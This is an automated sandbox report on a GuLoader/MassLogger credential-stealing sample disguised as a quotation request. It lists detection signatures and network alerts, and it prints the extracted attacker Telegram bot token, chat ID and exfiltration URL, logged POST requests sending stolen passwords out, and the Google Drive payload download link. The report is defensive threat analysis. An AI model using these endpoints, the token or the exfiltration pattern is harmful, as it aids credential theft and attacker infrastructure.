Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Request for Quotation New collaboration.exe

Overview

General Information

Sample name:Request for Quotation New collaboration.exe
Analysis ID:1571272
MD5:1e4847dd3c262a4303261601f0197a42
SHA1:eaa9a7dbdf8211dbe248b739480e349c0fb56583
SHA256:cb076958b9db298f34a9eeaafc4796f6d902b19b1696b76179db10612d371608
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI", "Telegram Chatid": "6897585916"}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2032277835.0000000003E08000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          Process Memory Space: Request for Quotation New collaboration.exe PID: 2556JoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-09T08:32:53.286833+010020577441Malware Command and Control Activity Detected192.168.2.949732149.154.167.220443TCP
            2024-12-09T08:32:56.876763+010020577441Malware Command and Control Activity Detected192.168.2.949739149.154.167.220443TCP
            2024-12-09T08:33:00.521871+010020577441Malware Command and Control Activity Detected192.168.2.949750149.154.167.220443TCP
            2024-12-09T08:33:04.094949+010020577441Malware Command and Control Activity Detected192.168.2.949758149.154.167.220443TCP
            2024-12-09T08:33:07.653342+010020577441Malware Command and Control Activity Detected192.168.2.949770149.154.167.220443TCP
            2024-12-09T08:33:11.270293+010020577441Malware Command and Control Activity Detected192.168.2.949780149.154.167.220443TCP
            2024-12-09T08:33:14.832911+010020577441Malware Command and Control Activity Detected192.168.2.949789149.154.167.220443TCP
            2024-12-09T08:33:18.273066+010020577441Malware Command and Control Activity Detected192.168.2.949800149.154.167.220443TCP
            2024-12-09T08:33:21.725921+010020577441Malware Command and Control Activity Detected192.168.2.949810149.154.167.220443TCP
            2024-12-09T08:33:25.145721+010020577441Malware Command and Control Activity Detected192.168.2.949820149.154.167.220443TCP
            2024-12-09T08:33:28.575097+010020577441Malware Command and Control Activity Detected192.168.2.949831149.154.167.220443TCP
            2024-12-09T08:33:32.007339+010020577441Malware Command and Control Activity Detected192.168.2.949840149.154.167.220443TCP
            2024-12-09T08:33:35.485405+010020577441Malware Command and Control Activity Detected192.168.2.949850149.154.167.220443TCP
            2024-12-09T08:33:38.920720+010020577441Malware Command and Control Activity Detected192.168.2.949860149.154.167.220443TCP
            2024-12-09T08:33:42.432226+010020577441Malware Command and Control Activity Detected192.168.2.949870149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-09T08:32:43.321758+010028032742Potentially Bad Traffic192.168.2.949714132.226.247.7380TCP
            2024-12-09T08:32:51.134363+010028032742Potentially Bad Traffic192.168.2.949714132.226.247.7380TCP
            2024-12-09T08:32:54.931232+010028032742Potentially Bad Traffic192.168.2.949737132.226.247.7380TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-09T08:32:34.475462+010028032702Potentially Bad Traffic192.168.2.949711172.217.19.174443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: Request for Quotation New collaboration.exeAvira: detected
            Source: 00000005.00000002.2835640876.0000000035323000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI", "Telegram Chatid": "6897585916"}
            Source: Request for Quotation New collaboration.exe.2556.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendMessage"}
            Source: Request for Quotation New collaboration.exeReversingLabs: Detection: 52%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351AB4C0 CryptUnprotectData,5_2_351AB4C0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_351ABCB8 CryptUnprotectData,5_2_351ABCB8
            Source: Request for Quotation New collaboration.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49715 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.9:49711 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.9:49712 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49732 version: TLS 1.2
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405772
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_0040622D FindFirstFileW,FindClose,0_2_0040622D
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_00402770 FindFirstFileW,0_2_00402770
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_00402770 FindFirstFileW,5_2_00402770
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_00405772 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405772
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_0040622D FindFirstFileW,FindClose,5_2_0040622D
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 0015E959h5_2_0015E6A8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 0015F082h5_2_0015EC58
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 0015F082h5_2_0015EFAF
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AAC65h5_2_351AA928
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AD5D8h5_2_351AD330
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AEDF0h5_2_351AEB48
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AC020h5_2_351ABD78
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351A9619h5_2_351A9370
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AF248h5_2_351AEFA0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AC478h5_2_351AC1D0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351A9A71h5_2_351A97C8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AF6A0h5_2_351AF3F8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AC8D0h5_2_351AC628
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351A9EC9h5_2_351A9C20
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AFAF8h5_2_351AF850
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AA321h5_2_351AA078
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351ACD28h5_2_351ACA80
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AD180h5_2_351ACED8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AA779h5_2_351AA4D0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 351AE998h5_2_351AE6F0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE4548h5_2_37EE42A0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE630Dh5_2_37EE6130
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE6C97h5_2_37EE6130
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then push 00000000h5_2_37EE98D0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE49A0h5_2_37EE46F8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]5_2_37EEA6C7
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_37EE5631
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE18A0h5_2_37EE15F8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE3840h5_2_37EE3598
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE0740h5_2_37EE0498
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE25AAh5_2_37EE2300
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE1448h5_2_37EE11A0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE33E8h5_2_37EE3140
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE02E8h5_2_37EE0040
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE5250h5_2_37EE4FA8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE2150h5_2_37EE1EA8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE40F0h5_2_37EE3E48
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE0FF0h5_2_37EE0D48
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE2F90h5_2_37EE2CE8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE4DF8h5_2_37EE4B50
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE1CF8h5_2_37EE1A50
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE3C98h5_2_37EE39F0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE0B98h5_2_37EE08F0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then jmp 37EE2B38h5_2_37EE2890
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then push 00000000h5_2_3845E628
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then push 00000000h5_2_3845F176
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]5_2_3845F438

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49750 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49732 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49739 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49758 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49780 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49789 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49770 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49820 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49810 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49831 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49870 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49860 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49840 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49850 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.9:49800 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd17f9c670142fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd18292170108fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd18556e1b4be9Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd18817804e060Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd18abdf1d4165Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd18d604afe111Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd190142b581ddHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd192ae3f7a3c5Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1955993a0d8bHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd197eb93c5cf4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd19a8eb1779e4Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd19d6c99f3d5cHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1a09955ebf67Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1a413e5c3134Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7234679344:AAGl5nGx0Ytu5pL8H_Rv2nR7Ahy85jEjxEI/sendDocument?chat_id=6897585916&caption=user%20/%20Passwords%20/%208.46.123.228 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd1a842186c56fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 172.67.177.134 172.67.177.134
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49737 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49714 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49711 -> 172.217.19.174:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.9:49715 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1OlIwWq_GKcHvk57DLTBJYgDUIGtf5du_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
